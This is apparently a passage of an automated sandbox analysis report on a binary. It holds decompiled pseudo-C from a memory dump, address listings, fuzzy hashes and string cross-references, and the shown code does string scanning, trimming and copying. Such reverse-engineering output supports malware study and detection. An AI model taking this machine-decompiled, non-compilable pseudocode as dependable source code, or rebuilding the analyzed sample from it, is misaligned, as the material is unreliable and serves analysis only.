													E003C9510( &_v200);
													E003AE2F0(_t1045,  &_v308, _t1569);
													E003C9510( &_v324);
													__eflags = 0;
													return 0;
												} else {
													_t1045 = _t1045 + 1;
													__eflags = _t1045 - 0xa;
													if(_t1045 != 0xa) {
														continue;
													} else {
														E003C9510(_t1576 + 0x40);
														E003AE230(_t1576 + 0x128);
														E003D2530(_t1045,  &_v480, _t1466, _t1510, _t1549);
														E003C9510( &_v368);
														E003C9510( &_v384);
														E003C9510( &_v400);
														E003C9510( &_v200);
														E003AE2F0(_t1045,  &_v308, _t1569);
														E003C9510( &_v324);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_push(0);
											_t1467 = _v168;
											__eflags = _t1467;
											_t1468 =  !=  ? _t1467 + 0xc : _t1467;
											_push( !=  ? _t1467 + 0xc : _t1467);
											_t1047 = E003D1A80( !=  ? _t1467 + 0xc : _t1467, _t1467,  &_v480, 0x2710);
											E003C9510(_t1576 + 0x50);
											E003AE230(_t1576 + 0x138);
											E003D2530(_t1047,  &_v480,  !=  ? _t1467 + 0xc : _t1467, _t1507, _t1546);
											E003C9510( &_v368);
											E003C9510( &_v384);
											E003C9510( &_v400);
											E003C9510( &_v200);
											E003AE2F0(_t1047,  &_v308, _t1569);
											E003C9510( &_v324);
											__eflags = _t1047 - 1;
											_t465 = _t1047 - 1 > 0;
											__eflags = _t465;
											return 0 | _t465;
										} else {
											E003AE230( &_v432);
											E003D2530( &_v624, _t1576 + 0x110, _t1461, _t1504, _t1544);
											E003C9510( &_v344);
											E003C9510(_t1576 + 0x170);
											E003C9510( &_v376);
											E003C9510( &_v176);
											E003AE2F0( &_v624,  &_v284, _t1569);
											E003C9510( &_v300);
											__eflags = 0;
											return 0;
										}
									}
								}
							}
						} else {
							goto L6;
						}
					}
				} else {
					E003C9510(_t1572 + 0x228);
					E003AE2F0(_t1027,  &_v180, _t1569);
					E003C9510( &_v196);
					return 0;
				}
				L95:
			}

0x003aacd9
0x003aacdf
0x003aace3
0x003aacf4
0x003aacf7
0x003aacfc
0x003aad05
0x003aad0c
0x003aad13
0x003aad1b
0x003aad20
0x003aad29
0x003aad2e
0x003aad3d
0x003aad41
0x003aad57
0x003aad73
0x003aad78
0x003aad84
0x003aad88
0x003aad8b
0x003aad93
0x003aada9
0x003aadc5
0x003aadca
0x003aadd6
0x003aadda
0x003aaddd
0x003aade5
0x003aadfb
0x003aae17
0x003aae1c
0x003aae28
0x003aae2c
0x003aae2f
0x003aae37
0x003aae4d
0x003aae69
0x003aae6e
0x003aae7a
0x003aae7e
0x003aae81
0x003aae89
0x003aae9f
0x003aaebb
0x003aaec0
0x003aaecc
0x003aaed0
0x003aaed3
0x003aaedb
0x003aaef1
0x003aaf0d
0x003aaf12
0x003aaf23
0x003aaf26
0x003aaf34
0x003aaf39
0x003aaf3e
0x003aaf50
0x003aaf55
0x003aaf5a
0x003aaf6c
0x003aaf71
0x003aaf76
0x003aaf88
0x003aaf8d
0x003aaf92
0x003aafa4
0x003aafa9
0x003aafae
0x003aafc0
0x003aafc5
0x003aafd1
0x003aafd6
0x003aafeb
0x003aaff0
0x003aaff9
0x003ab002
0x003ab039
0x003ab042
0x003ab05f
0x003ab072
0x003ab077
0x003ab07c
0x003ac89d
0x003ac8a0
0x003ac8a4
0x003ac8a6
0x003ac8aa
0x003ac8af
0x003ac8d5
0x003ac8e1
0x003ac8e9
0x003ac8f5
0x003ac903
0x003ac908
0x003ac90e
0x00000000
0x003ac914
0x003ac914
0x003ac920
0x003ac924
0x003ac928
0x003ac92a
0x00000000
0x003ac930
0x003ac930
0x003ac935
0x00000000
0x003ac93b
0x003ac93b
0x003ac946
0x003ac954
0x003ac967
0x003ac96c
0x003ac978
0x003ac980
0x003ac98c
0x003ac99f
0x003ac9a1
0x003ac9ab
0x003ac9b5
0x003ac9b8
0x003ac9c0
0x003ac9c2
0x003ac9c6
0x003ac9c8
0x003ac9cc
0x003ac9cc
0x003ac9ce
0x003ac9d2
0x003ac9d2
0x003ac9d3
0x003ac9d7
0x003ac9db
0x003ac9de
0x003ac9e1
0x00000000
0x00000000
0x003ac9e3
0x003ac9e7
0x003ac9ea
0x00000000
0x00000000
0x00000000
0x003ac9ea
0x003ac9ec
0x003ac9ec
0x003ac9f7
0x003ac9ff
0x003ac9ff
0x003ac935
0x003ac92a
0x003ab082
0x003ab082
0x003ab082
0x003ab08b
0x003ab08b
0x003ab097
0x003ab0a3
0x003ab0a8
0x003ab0b7
0x003ab0bb
0x003ab0d1
0x003ab0ed
0x003ab0f2
0x003ab0fe
0x003ab102
0x003ab105
0x003ab10d
0x003ab123
0x003ab13f
0x003ab144
0x003ab150
0x003ab154
0x003ab157
0x003ab15f
0x003ab175
0x003ab191
0x003ab196
0x003ab19b
0x003ab19e
0x003ab1aa
0x003ab1b9
0x003ab1be
0x003ab1c2
0x003ab1d0
0x003ab1d5
0x003ab1da
0x003ab1ec
0x003ab1f1
0x003ab1f6
0x003ab20d
0x003ab215
0x003ab21c
0x003ab223
0x003ab22c
0x003ab231
0x003ab23a
0x003ab246
0x003ab248
0x003ab24f
0x003ab262
0x003ab269
0x003ab282
0x003ab290
0x003ab2a7
0x003ab2ac
0x003ab2bb
0x003ab2c2
0x003ab2d2
0x003ab2d9
0x003ab2ee
0x003ab2f3
0x003ab2fa
0x003ab303
0x003ab30a
0x003ab319
0x003ab320
0x003ab32c
0x003ab338
0x003ab344
0x003ab350
0x003ab35c
0x003ab361
0x003ab36f
0x003ab30c
0x003ab313
0x003ab317
0x003ab37e
0x003ab383
0x003ab38b
0x003ab399
0x003ab39a
0x003ab39b
0x003ab3a4
0x003ab3ab
0x003ab3b5
0x003ab3bf
0x003ab3c9
0x003ab3d5
0x003ab3d6
0x003ab3dd
0x003ab3e1
0x003ab3e5
0x003ab3f3
0x003ab401
0x003ab402
0x003ab40a
0x003ab40e
0x003ab412
0x003ab420
0x003ab433
0x003ab434
0x003ab438
0x003ab43c
0x003ab440
0x003ab460
0x003ab46c
0x003ab476
0x003ab47c
0x003ab482
0x003ab487
0x003ab496
0x003ab49a
0x003ab4b0
0x003ab4cc
0x003ab4d1
0x003ab4dd
0x003ab4e1
0x003ab4e4
0x003ab4ec
0x003ab502
0x003ab51e
0x003ab523
0x003ab52f
0x003ab533
0x003ab536
0x003ab53e
0x003ab554
0x003ab570
0x003ab575
0x003ab581
0x003ab585
0x003ab588
0x003ab590
0x003ab5a6
0x003ab5c2
0x003ab5c7
0x003ab5d3
0x003ab5d7
0x003ab5da
0x003ab5e2
0x003ab5f8
0x003ab614
0x003ab619
0x003ab625
0x003ab629
0x003ab62c
0x003ab634
0x003ab64a
0x003ab666
0x003ab66b
0x003ab677
0x003ab67b
0x003ab67e
0x003ab686
0x003ab69c
0x003ab6b8
0x003ab6bd
0x003ab6c9
0x003ab6cd
0x003ab6d0
0x003ab6d8
0x003ab6ee
0x003ab70a
0x003ab70f
0x003ab714
0x003ab720
0x003ab723
0x003ab731
0x003ab736
0x003ab73b
0x003ab74a
0x003ab74f
0x003ab754
0x003ab763
0x003ab768
0x003ab76d
0x003ab77f
0x003ab784
0x003ab789
0x003ab79b
0x003ab7a0
0x003ab7a5
0x003ab7b7
0x003ab7bc
0x003ab7c1
0x003ab7d3
0x003ab7d8
0x003ab7dd
0x003ab7ef
0x003ab7f4
0x003ab800
0x003ab808
0x003ab80d
0x003ab814
0x003ab824
0x003ab826
0x003ab828
0x003ac829
0x003ac835
0x003ac841
0x003ac84d
0x003ac859
0x003ac865
0x003ac871
0x003ac87d
0x003ac882
0x003ac890
0x003ab82e
0x003ab835
0x003ab835
0x003ab83c
0x003aba4c
0x003aba50
0x003aba50
0x003aba52
0x003aba56
0x003aba56
0x003aba5f
0x003aba71
0x003aba85
0x003aba93
0x003abaa6
0x003abab2
0x003ababe
0x003abac3
0x003abad1
0x003abad7
0x003abadc
0x003abade
0x003abb91
0x003abb91
0x003abb9a
0x003abb9f
0x003abba3
0x003abbb2
0x003abbbd
0x003abbc6
0x003abbca
0x003abbd0
0x003abbd7
0x003abbdb
0x003abbe2
0x003abbe6
0x003abbec
0x003abbf2
0x003abbf7
0x003abbf9
0x003abc7d
0x003abc89
0x003abc9d
0x003abca4
0x003abcb0
0x003abcb7
0x003ac815
0x003ac819
0x00000000
0x003abcbd
0x003abcc4
0x003abcc9
0x003abcd0
0x003abce0
0x003abce2
0x003abce4
0x003ac7ab
0x003ac7b7
0x003ac7c3
0x003ac7cf
0x003ac7db
0x003ac7e7
0x003ac7f3
0x003ac7ff
0x003ac804
0x003ac812
0x00000000
0x00000000
0x00000000
0x003abce4
0x00000000
0x00000000
0x00000000
0x003abae4
0x003abae4
0x003abae6
0x003abaea
0x003abaec
0x003abaee
0x003abaf6
0x003abafb
0x003abb04
0x003abb09
0x003abb18
0x003abb23
0x003abb2c
0x003abb30
0x003abb33
0x003abb39
0x003abb41
0x003abb45
0x003abb49
0x003abb4d
0x003abb55
0x003abb5b
0x003abb60
0x003abb62
0x00000000
0x00000000
0x003abb6d
0x003abb72
0x003abb7c
0x003abb7f
0x003abb80
0x003abb85
0x003abb87
0x00000000
0x003abb8d
0x003abb8d
0x00000000
0x003abb8d
0x00000000
0x003abb87
0x003abbfb
0x003abc02
0x003abc0e
0x003abc1a
0x003abc26
0x003abc32
0x003abc3e
0x003abc4a
0x003abc56
0x003abc62
0x003abc67
0x003abc75
0x003abc75
0x00000000
0x003abcea
0x003abcea
0x003abceb
0x003abceb
0x003abcfb
0x003abd07
0x003abd13
0x003abd1f
0x003abd2b
0x003abd37
0x003abd43
0x003abd4f
0x003abd54
0x003abd62
0x003ab842
0x003ab842
0x003ab842
0x003ab846
0x003ab846
0x003ab848
0x003ab84c
0x003ab853
0x003ab85a
0x003ab85a
0x003ab863
0x003ab86c
0x003ab870
0x003ab875
0x003ab87d
0x003ab881
0x003ab885
0x003ab892
0x003ab89d
0x003ab8a5
0x003ab8a9
0x003ab8af
0x003ab8b5
0x003ab8ba
0x003ab8bc
0x00000000
0x00000000
0x003ab8ce
0x003ab8d0
0x003ab8dd
0x003ab8df
0x003ab8e1
0x003abd6c
0x003abd78
0x003abd84
0x003abd90
0x003abd9c
0x003abda8
0x003abdb4
0x003abdc0
0x003abdc5
0x003abdd3
0x003ab8e7
0x003ab8e7
0x003ab8e8
0x003ab8eb
0x00000000
0x003ab8f1
0x003ab8f8
0x003ab904
0x003ab910
0x003ab91c
0x003ab928
0x003ab934
0x003ab940
0x003ab94c
0x003ab951
0x003ab95f
0x003ab95f
0x003ab8eb
0x00000000
0x003ab8e1
0x003ab962
0x003ab969
0x003ab969
0x003ab96b
0x003ab972
0x003ab979
0x003ab980
0x003ab980
0x003ab985
0x003ab98c
0x003ab993
0x003ab994
0x003ab99c
0x003ab9a8
0x003ab9aa
0x00000000
0x00000000
0x003ab9bc
0x003ab9be
0x003ab9cb
0x003ab9cd
0x003ab9cf
0x003abddd
0x003abde9
0x003abdf5
0x003abe01
0x003abe0d
0x003abe19
0x003abe25
0x003abe31
0x003abe36
0x003abe44
0x003ab9d5
0x003ab9d5
0x003ab9d6
0x003ab9d9
0x00000000
0x003ab9db
0x003ab9e2
0x003ab9ee
0x003ab9fa
0x003aba06
0x003aba12
0x003aba1e
0x003aba2a
0x003aba36
0x003aba3b
0x003aba49
0x003aba49
0x003ab9d9
0x00000000
0x003ab9cf
0x003abe47
0x003abe58
0x003abe5c
0x003abe5d
0x003abe61
0x003abe65
0x003abe6b
0x003abe6f
0x003abe75
0x003abe79
0x003abe7d
0x003abe82
0x003abe89
0x003abe8c
0x003abe91
0x003abe99
0x003abe9d
0x003abea2
0x003abea4
0x003ac73a
0x003ac746
0x003ac752
0x003ac75e
0x003ac76a
0x003ac776
0x003ac782
0x003ac78e
0x003ac793
0x003ac7a1
0x003abeaa
0x003abeaa
0x003abeac
0x003abeb0
0x003abeb4
0x003abebb
0x003abebf
0x003abec6
0x003abec6
0x003abec6
0x003abecf
0x003abed4
0x003abed8
0x003abee0
0x003abeeb
0x003abef4
0x003abef8
0x003abefe
0x003abf02
0x003abf06
0x003abf0c
0x003abf12
0x003abf18
0x003abf1d
0x003abf1f
0x00000000
0x00000000
0x003abf21
0x003abf21
0x003abf23
0x003abf2a
0x003abf2f
0x003abf33
0x003abf33
0x003abf35
0x00000000
0x00000000
0x003abf3b
0x003abf3e
0x003abfde
0x003abfe3
0x003abf44
0x003abf49
0x003abf4e
0x00000000
0x003abf4e
0x003abfea
0x003abffc
0x003abffe
0x003ac08e
0x003ac09a
0x003ac0a6
0x003ac0b2
0x003ac0be
0x003ac0ca
0x003ac0d6
0x003ac0e2
0x003ac0e7
0x003ac0f5
0x003ac004
0x003ac008
0x003ac009
0x003ac00d
0x003ac010
0x00000000
0x003ac016
0x003ac01d
0x003ac029
0x003ac035
0x003ac041
0x003ac04d
0x003ac059
0x003ac065
0x003ac071
0x003ac076
0x003ac084
0x003ac084
0x003ac010
0x00000000
0x003abffe
0x003ac0f8
0x003ac0ff
0x00000000
0x003ac0ff
0x003abf51
0x003abf58
0x003abf5a
0x003abf61
0x003abf68
0x003abf6c
0x003abf75
0x003abf7a
0x003abf88
0x003abf89
0x003abf8d
0x003abf94
0x003abf95
0x003abf96
0x003abfa4
0x003abfa6
0x00000000
0x00000000
0x003abfac
0x003abfac
0x003abfae
0x003abfba
0x003abfbc
0x003abfc0
0x003abfc2
0x00000000
0x00000000
0x003abfc8
0x003abfcb
0x003ac106
0x003ac10b
0x003abfd1
0x003abfd6
0x003abfdb
0x00000000
0x003abfdb
0x00000000
0x003abfcb
0x003ac118
0x003ac11a
0x003ac11c
0x003ac1ac
0x003ac1b8
0x003ac1c4
0x003ac1d0
0x003ac1dc
0x003ac1e8
0x003ac1f4
0x003ac200
0x003ac205
0x003ac213
0x003ac122
0x003ac126
0x003ac127
0x003ac12b
0x003ac12e
0x00000000
0x003ac134
0x003ac13b
0x003ac147
0x003ac153
0x003ac15f
0x003ac16b
0x003ac177
0x003ac183
0x003ac18f
0x003ac194
0x003ac1a2
0x003ac1a2
0x003ac12e
0x00000000
0x003ac11c
0x003ac216
0x003ac21d
0x003ac221
0x003ac227
0x003ac236
0x003ac23a
0x003ac23f
0x003ac241
0x003ac2b4
0x003ac2ba
0x003ac2bf
0x003ac2cf
0x003ac2e8
0x003ac2f1
0x003ac2fd
0x003ac309
0x003ac311
0x003ac314
0x003ac317
0x003ac328
0x003ac32d
0x003ac32f
0x003ac333
0x003ac33a
0x003ac341
0x003ac347
0x003ac357
0x003ac358
0x003ac35f
0x003ac366
0x003ac367
0x003ac368
0x003ac371
0x003ac376
0x003ac378
0x00000000
0x00000000
0x003ac37e
0x003ac37e
0x003ac380
0x003ac38c
0x003ac38e
0x003ac392
0x003ac394
0x00000000
0x00000000
0x003ac396
0x003ac399
0x003ac3a8
0x003ac3ad
0x003ac39b
0x003ac3a0
0x003ac3a5
0x00000000
0x003ac3a5
0x00000000
0x003ac399
0x003ac3ba
0x003ac3bc
0x003ac3be
0x003ac454
0x003ac460
0x003ac46c
0x003ac478
0x003ac484
0x003ac490
0x003ac49c
0x003ac4a8
0x003ac4b4
0x003ac4b9
0x003ac4c7
0x003ac3c4
0x003ac3c8
0x003ac3c9
0x003ac3cd
0x003ac3d0
0x00000000
0x003ac3d6
0x003ac3da
0x003ac3e6
0x003ac3f2
0x003ac3fe
0x003ac40a
0x003ac416
0x003ac422
0x003ac42e
0x003ac43a
0x003ac43f
0x003ac44d
0x003ac44d
0x003ac3d0
0x00000000
0x003ac3be
0x003ac4ca
0x003ac4d1
0x003ac4d1
0x003ac4d3
0x003ac4da
0x003ac4e1
0x003ac4e3
0x003ac4e3
0x003ac4ec
0x003ac4f1
0x003ac4f5
0x003ac4fd
0x003ac501
0x003ac50c
0x003ac517
0x003ac51b
0x003ac522
0x003ac526
0x003ac52d
0x003ac531
0x003ac537
0x003ac53d
0x003ac542
0x003ac544
0x00000000
0x00000000
0x003ac5f3
0x003ac5f3
0x003ac5f5
0x003ac5fc
0x003ac603
0x003ac605
0x00000000
0x00000000
0x003ac607
0x003ac60a
0x003ac619
0x003ac61e
0x003ac60c
0x003ac611
0x003ac616
0x00000000
0x003ac616
0x00000000
0x003ac60a
0x003ac62b
0x003ac62d
0x003ac62d
0x003ac62f
0x003ac6bd
0x003ac6c9
0x003ac6d5
0x003ac6e1
0x003ac6ed
0x003ac6f9
0x003ac705
0x003ac711
0x003ac71d
0x003ac722
0x003ac730
0x003ac635
0x003ac635
0x003ac636
0x003ac639
0x00000000
0x003ac63f
0x003ac643
0x003ac64f
0x003ac65b
0x003ac667
0x003ac673
0x003ac67f
0x003ac68b
0x003ac697
0x003ac6a3
0x003ac6a8
0x003ac6b6
0x003ac6b6
0x003ac639
0x00000000
0x003ac62f
0x003ac54a
0x003ac54c
0x003ac553
0x003ac558
0x003ac55b
0x003ac56e
0x003ac577
0x003ac583
0x003ac58f
0x003ac59b
0x003ac5a7
0x003ac5b3
0x003ac5bf
0x003ac5cb
0x003ac5d7
0x003ac5de
0x003ac5e1
0x003ac5e1
0x003ac5f0
0x003ac243
0x003ac24a
0x003ac256
0x003ac262
0x003ac26e
0x003ac27a
0x003ac286
0x003ac292
0x003ac29e
0x003ac2a3
0x003ac2b1
0x003ac2b1
0x003ac241
0x003abea4
0x003ab83c
0x00000000
0x00000000
0x00000000
0x003ab317
0x003ab004
0x003ab00b
0x003ab017
0x003ab023
0x003ab036
0x003ab036
0x00000000

Strings

ZFhj, xrefs: 003AB588

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: ZFhj
API String ID: 0-4053837889
Opcode ID: 6c8ad90bbe55e50228e23d7f36214d1d7616faada3d6df50b878439393d2fd79
Instruction ID: 2d0eaeebd1f4b2d33344aa3aebe39bb3c4b6d4fc61fbb1deb5fd31a24ea92240
Opcode Fuzzy Hash: 6c8ad90bbe55e50228e23d7f36214d1d7616faada3d6df50b878439393d2fd79
Instruction Fuzzy Hash: C6E22F315183809BC336EF74D896BEFB3E4AFD6310F114A2EE4898A192EF315955CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003C3EC0, Relevance: 2.4, Strings: 1, Instructions: 1131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E003C3EC0(signed int __ecx) {
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _t368;
				unsigned int _t371;
				void* _t376;
				signed int* _t377;
				char* _t378;
				char _t381;
				signed int _t382;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t396;
				char* _t397;
				char _t400;
				char _t403;
				signed int _t404;
				signed int _t407;
				signed int _t410;
				signed int _t412;
				void* _t413;
				char* _t416;
				signed int _t418;
				unsigned int _t424;
				signed int _t425;
				char* _t431;
				signed int _t436;
				unsigned int _t442;
				char* _t445;
				void* _t447;
				char _t449;
				signed int _t450;
				signed int _t451;
				char* _t463;
				char _t477;
				char _t479;
				char _t481;
				char _t482;
				signed int _t483;
				signed int _t484;
				char _t491;
				signed int _t492;
				void* _t503;
				signed int _t508;
				unsigned int _t509;
				signed int _t511;
				signed int _t512;
				signed int _t520;
				char* _t521;
				char* _t522;
				char* _t523;
				signed int _t524;
				signed int _t527;
				char* _t535;
				signed int _t537;
				unsigned int _t543;
				signed int _t545;
				signed int _t546;
				char _t548;
				char _t549;
				char _t550;
				signed int _t551;
				signed int _t552;
				unsigned int _t556;
				void* _t565;
				signed int _t566;
				char* _t568;
				char _t569;
				char _t570;
				signed int _t571;
				signed int _t573;
				signed int _t574;
				unsigned int _t575;
				char* _t576;
				char _t577;
				char _t578;
				char* _t583;
				char _t584;
				char _t585;
				signed int _t586;
				unsigned int _t592;
				void* _t595;
				signed int _t597;
				signed int _t600;
				char _t602;
				void* _t603;
				unsigned int _t604;
				signed int _t605;
				unsigned int _t610;
				signed int _t612;
				signed int _t614;
				char* _t615;
				char _t616;
				char _t617;
				char _t620;
				signed int _t621;
				void* _t624;
				signed int _t626;
				char _t629;
				signed int _t630;
				signed int _t636;
				signed int _t641;
				char* _t642;
				char _t644;
				signed int _t646;
				char _t649;
				signed int _t650;
				signed int _t652;
				signed int _t654;
				signed int _t655;
				signed int _t658;
				char* _t659;
				void* _t660;
				void* _t665;
				intOrPtr _t667;
				signed int _t672;
				signed int _t673;
				unsigned int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				unsigned int* _t683;
				signed int _t685;
				signed int _t686;
				void* _t688;
				signed int _t689;
				signed int _t693;
				signed int _t694;
				char* _t695;
				void* _t696;
				unsigned int _t697;
				signed int _t700;
				unsigned int _t702;
				signed int _t704;
				intOrPtr* _t705;
				signed int _t707;
				signed int _t714;
				void* _t720;
				signed int _t721;
				void* _t723;
				void* _t727;

				_t723 = (_t721 & 0xfffffff0) - 0x44;
				_t505 = __ecx;
				_t727 =  *__ecx;
				if(_t727 == 0) {
					return __ecx;
				} else {
					if(_t727 <= 0) {
						_v48 = 0;
						_t604 = 0;
						if( &_v52 == __ecx) {
							goto L288;
						} else {
							goto L287;
						}
					} else {
						_v64 = 0;
						asm("pxor xmm0, xmm0");
						_v40 = __ecx;
						do {
							_t410 = _v64 + 1;
							_t620 =  *0x3da24c; // 0xa0d0920
							_t550 =  *0x3da250; // 0x0
							_v64 = _t410;
							_v36 = _t620;
							_v32 = _t550;
							_t621 =  *( *( *((intOrPtr*)(_v40 + 4)) + _t410 * 4 - 4));
							if(_t621 == 0) {
								_t680 = 0;
								_t412 = 0;
							} else {
								_t505 = _t621 & 0x0000000f;
								if(_t505 == 0) {
									L8:
									asm("pxor xmm1, xmm1");
									_t503 =  ~( ~_t505 + 0x0000000f & 0x0000000f) + 0x7fffffff;
									while(1) {
										asm("movdqu xmm0, [edx+ebx]");
										asm("pcmpeqb xmm0, xmm1");
										asm("pmovmskb ecx, xmm0");
										if(_t550 != 0) {
											break;
										}
										_t505 = _t505 + 0x10;
										if(_t505 < _t503) {
											continue;
										} else {
											if(_t503 >= 0x7fffffff) {
												L14:
												_t412 = 0x7fffffff;
												goto L15;
											} else {
												while( *((char*)(_t503 + _t621)) != 0) {
													_t503 = _t503 + 1;
													if(_t503 < 0x7fffffff) {
														continue;
													} else {
														goto L14;
													}
													goto L20;
												}
												goto L295;
											}
										}
										goto L20;
									}
									asm("bsf eax, ecx");
									_t412 = _t503 + _t505;
									goto L295;
								} else {
									_t412 = 0;
									_t505 =  ~_t505 + 0x10;
									while( *((char*)(_t412 + _t621)) != 0) {
										_t412 = _t412 + 1;
										if(_t412 < _t505) {
											continue;
										} else {
											goto L8;
										}
										goto L20;
									}
									L295:
									if(_t412 > 0) {
										L15:
										_t505 = _v36;
										_t680 = 0;
										while(_t505 != 0) {
											while(1) {
												_t720 = _t720 + 1;
												if(_t603 ==  *((intOrPtr*)(_t723 + _t720 + 0x2f))) {
													break;
												}
												if( *((char*)(_t723 + _t720 + 0x30)) != 0) {
													continue;
												}
												goto L20;
											}
											_t680 = _t680 + 1;
											if(_t680 < _t412) {
												continue;
											} else {
												goto L20;
											}
											goto L301;
										}
									} else {
										_t680 = 0;
									}
								}
							}
							L20:
							_t413 = _t412 - 1;
							_t700 = _t412 - _t680;
							if(_t413 >= _t680) {
								_v60 = 0;
								_t505 = _t413 - _t680 + 1;
								_v56 = _t680;
								_t602 = _v36;
								_t689 = _v60;
								_v48 = _t621;
								_v52 = _t505;
								while(_t602 != 0) {
									_t667 =  *((intOrPtr*)(_t413 + _v48));
									while(1) {
										_t505 = 1;
										if(_t667 ==  *((intOrPtr*)(_t723 + 0x30))) {
											break;
										}
										if( *((char*)(_t723 + 0x31)) != 0) {
											continue;
										}
										goto L26;
									}
									_t689 = _t689 + 1;
									_t413 = _t413 - 1;
									_t700 = _t700 - 1;
									if(_t689 < _v52) {
										continue;
									} else {
										break;
									}
									goto L301;
								}
								L26:
								_t621 = _v48;
								_t680 = _v56;
							}
							if(_t700 == 0) {
								L66:
								_push(0x40);
								_t505 = E003B1030();
								_t723 = _t723 + 4;
								 *_t505 = 0;
							} else {
								if(_t621 == 0) {
									_t483 = 0;
								} else {
									_t600 = _t621 & 0x0000000f;
									if(_t600 == 0) {
										L33:
										asm("pxor xmm1, xmm1");
										_t483 =  ~( ~_t600 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [edx+ecx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb ebx, xmm0");
											if(_t505 != 0) {
												break;
											}
											_t600 = _t600 + 0x10;
											if(_t600 < _t483) {
												continue;
											} else {
												if(_t483 >= 0x7fffffff) {
													L39:
													_t483 = 0x7fffffff;
												} else {
													while( *((char*)(_t483 + _t621)) != 0) {
														_t483 = _t483 + 1;
														if(_t483 < 0x7fffffff) {
															continue;
														} else {
															goto L39;
														}
														goto L40;
													}
												}
											}
											goto L40;
										}
										asm("bsf eax, ebx");
										_t483 = _t483 + _t600;
									} else {
										_t483 = 0;
										_t600 =  ~_t600 + 0x10;
										while( *((char*)(_t483 + _t621)) != 0) {
											_t483 = _t483 + 1;
											if(_t483 < _t600) {
												continue;
											} else {
												goto L33;
											}
											goto L40;
										}
									}
								}
								L40:
								_t687 =  <=  ? 0 : _t680;
								_t688 =  <  ? _t483 :  <=  ? 0 : _t680;
								_t484 = _t483 - _t688;
								if(_t700 < 0 || _t700 > _t484) {
									_t700 = _t484;
								}
								if(_t688 + _t621 == 0 ||  *(_t621 + _t688) == 0) {
									goto L66;
								} else {
									if(_t700 == 0) {
										_t492 = _t621 + _t688;
										_t597 = _t492 & 0x0000000f;
										if(_t597 == 0) {
											L50:
											asm("pxor xmm1, xmm1");
											_t700 =  ~( ~_t597 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
												asm("movdqu xmm0, [eax+ecx]");
												asm("pcmpeqb xmm0, xmm1");
												asm("pmovmskb ebx, xmm0");
												if(_t505 != 0) {
													break;
												}
												_t597 = _t597 + 0x10;
												if(_t597 < _t700) {
													continue;
												} else {
													if(_t700 >= 0x7fffffff) {
														L56:
														_t700 = 0x7fffffff;
													} else {
														while( *((char*)(_t700 + _t492)) != 0) {
															_t700 = _t700 + 1;
															if(_t700 < 0x7fffffff) {
																continue;
															} else {
																goto L56;
															}
															goto L57;
														}
													}
												}
												goto L57;
											}
											asm("bsf esi, ebx");
											_t700 = _t700 + _t597;
										} else {
											_t700 = 0;
											_t597 =  ~_t597 + 0x10;
											while( *((char*)(_t700 + _t492)) != 0) {
												_t700 = _t700 + 1;
												if(_t700 < _t597) {
													continue;
												} else {
													goto L50;
												}
												goto L57;
											}
										}
									}
									L57:
									_t40 = _t700 + 1; // -2147483661
									_t511 =  <=  ? 0x40 : _t40;
									if(_t511 > 0) {
										_t592 = (_t511 >> 5 >> 0x1a) + _t511 >> 6;
										_t512 = _t511 & 0x8000003f;
										if(_t512 < 0) {
											_t512 = (_t512 - 0x00000001 | 0xffffffc0) + 1;
										}
										_push(_t592 + (0 | _t512 > 0x00000000) << 6);
										_v48 = _t621;
										_t505 = E003B1030();
										_t723 = _t723 + 4;
										_t665 = _v48 + _t688;
										_t595 = 0;
										 *_t505 = 0;
										while(1) {
											_t595 = _t595 + 1;
											_t491 =  *((char*)(_t595 + _t665 - 1));
											 *((char*)(_t595 + _t505 - 1)) = _t491;
											if(_t700 != 0 && _t595 == _t700) {
												break;
											}
											if(_t491 != 0) {
												continue;
											} else {
											}
											goto L67;
										}
										 *((char*)(_t595 + _t505)) = 0;
									} else {
										_t505 = 0;
									}
								}
							}
							L67:
							_t551 = _v64;
							_t681 =  *((intOrPtr*)( *((intOrPtr*)(_v40 + 4)) + _t551 * 4 - 4));
							_t416 =  *_t681;
							if(_t416 != _t505) {
								if(_t505 == 0 ||  *_t505 == 0) {
									if(_t416 != 0) {
										 *_t416 = 0;
									}
									if( *(_t681 + 4) < 0x40) {
										_push(0x40);
										_v72 = E003B1030();
										_t723 = _t723 + 4;
										_t463 =  *_t681;
										if(_t463 == 0) {
											 *_v72 = 0;
										} else {
											if(_v72 != 0) {
												_t583 = _v72;
												_t649 =  *_t463;
												 *_t583 = _t649;
												if(_t649 != 0) {
													_v84 = _t505;
													_t650 = 0;
													_t523 = _t583;
													while(1) {
														_t650 = _t650 + 1;
														_t584 =  *((char*)(_t463 + _t650 * 2 - 1));
														 *((char*)(_t523 + _t650 * 2 - 1)) = _t584;
														if(_t584 == 0) {
															break;
														}
														_t585 =  *((char*)(_t463 + _t650 * 2));
														 *((char*)(_t523 + _t650 * 2)) = _t585;
														if(_t585 != 0) {
															continue;
														}
														break;
													}
													_t505 = _v84;
												}
												_t463 =  *_t681;
											}
											_push(1);
											_push(_t463);
											E003B10B0();
											_t723 = _t723 + 8;
										}
										 *_t681 = _v72;
										 *(_t681 + 4) = 0x40;
									}
								} else {
									_t652 = _t505 & 0x0000000f;
									if(_t652 == 0) {
										L74:
										asm("pxor xmm1, xmm1");
										_t714 =  ~( ~_t652 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [ebx+edx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb ecx, xmm0");
											if(_t551 != 0) {
												break;
											}
											_t652 = _t652 + 0x10;
											if(_t652 < _t714) {
												continue;
											} else {
												if(_t714 >= 0x7fffffff) {
													L80:
													_t714 = 0x7fffffff;
												} else {
													while( *((char*)(_t714 + _t505)) != 0) {
